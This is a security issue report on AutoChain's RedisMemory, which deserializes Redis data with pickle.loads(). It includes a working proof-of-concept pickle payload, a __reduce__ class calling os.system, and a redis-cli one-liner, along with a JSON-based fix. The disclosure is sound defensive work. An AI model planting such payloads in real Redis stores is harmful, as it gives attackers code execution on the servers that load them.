Security: Unsafe pickle deserialization in RedisMemory allows remote code execution

[CrepuscularIRIS]

Bug Description

RedisMemory uses pickle.loads() to deserialize data retrieved from Redis. Python's pickle module can execute arbitrary code during deserialization. If an attacker gains write access to the Redis instance (e.g., through an exposed Redis port, shared Redis cluster, or Redis command injection), they can store a malicious pickle payload that executes arbitrary code when loaded by AutoChain.

Location

autochain/memory/redis_memory.py:40,61

Reproduction

# Attacker writes malicious pickle to Redis:
import pickle
import redis
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))

r = redis.Redis()
r.set("autochain_prefix:key", pickle.dumps(Exploit()))

# When AutoChain loads this key via RedisMemory.load_memory():
# pickle.loads(pickled)  # Executes os.system("id > /tmp/pwned")

# Verify Redis is accessible (default: no auth required)
redis-cli SET "autochain:ChatMessageHistory" "$(python3 -c 'import pickle,os; print(pickle.dumps(type("X",(),{"__reduce__":lambda s:(os.system,("id",))})()), end="")')"

Impact

Remote code execution on the server running AutoChain, if Redis is shared or exposed.

Suggested Fix

# Option 1: Use JSON serialization instead of pickle
import json

def load_memory(self, key=None, default=None, **kwargs):
    data = self.redis_client.get(key)
    if not data:
        return default
    return json.loads(data)  # Safe: only parses JSON data

# Option 2: If complex objects must be stored, use a restricted deserializer
# like jsonpickle with a whitelist, or MessagePack

---

Found via automated codebase analysis. Happy to submit a PR if confirmed.